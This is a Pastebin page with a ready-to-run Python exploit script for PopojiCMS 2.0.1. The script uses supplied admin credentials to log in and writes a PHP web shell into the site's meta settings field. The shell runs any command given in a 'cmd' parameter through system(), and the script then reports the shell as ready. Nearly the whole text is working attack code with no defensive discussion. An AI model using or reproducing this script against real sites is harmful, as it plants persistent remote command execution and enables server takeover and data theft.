Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution
- # Date: 14/04/2024
- # Exploit Author: Ahmet Ümit BAYRAM
- # Vendor Homepage: https://www.popojicms.org/
- # Software Link:
- https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
- # Version: Version : 2.0.1
- # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
- import requests
- import time
- import sys
- def exploit(url, username, password):
- login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
- login_data = {"username": username, "password": password}
- headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f
- "{url}/po-admin/index.php"}
- session = requests.Session()
- login_response = session.post(login_url, data=login_data, headers=headers)
- if "Administrator PopojiCMS" in login_response.text:
- print("Login Successful!")
- time.sleep(1) # 1 saniye bekle
- else:
- print("Login Failed!")
- return
- edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
- edit_data = {"meta_content": """<html>
- <body>
- <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
- <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
- <input type="SUBMIT" value="Execute">
- </form>
- <pre>
- <?php
- if(isset($_GET['cmd']))
- {
- system($_GET['cmd']);
- }
- ?>
- </pre>
- </body>
- </html>"""}
- edit_response = session.post(edit_url, data=edit_data, headers=headers)
- if "cmd" in edit_response.text:
- print("Your shell is ready:", url)
- time.sleep(1)
- else:
- print("Exploit Failed!")
- return
- if __name__ == "__main__":
- if len(sys.argv) != 4:
- print("Kullanım: python exploit.py sitename username password")
- sys.exit(1)
- url = sys.argv[1]
- username = sys.argv[2]
- password = sys.argv[3]
- print("Exploiting...")
- time.sleep(1)
- print("Logging in...")
- time.sleep(1)
- exploit(url, username, password)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
